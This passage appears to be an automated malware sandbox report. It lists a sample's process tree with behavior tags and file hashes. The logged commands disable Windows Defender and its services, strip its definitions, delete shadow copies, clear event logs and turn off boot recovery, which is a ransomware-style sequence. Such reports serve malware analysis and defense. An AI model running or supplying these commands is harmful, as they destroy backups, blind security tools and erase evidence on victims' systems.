    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f | PID:796
    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f | PID:1736
    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID:3552
      - Modifies registry class
    C:\Windows\SYSTEM32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
PID:3916 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1568 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2344
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2248
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1728
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2252
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1868 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1608
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2992 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3256 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4024 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3960
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2804 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:600 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5 ad5cd538ca58cb28ede39c108acb5785
  SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- MD5 a5d084db334a6d26c301896f1a6192cd
  SHA1 e7473be98aed125bd83a7ae55a4ed233f81866b8
  SHA256 71d0b05798f08f29c416a206c1dca915cbe433f2ad9bbc5c9ef2e98c94717905
  SHA512 8a54338cb305692dc703c982eca8036ae686b6e457068339b94314158f4f84dd085a212871d5d557c95820aa47feada9c5fe3f3340ac1db77ca90f4444282fcb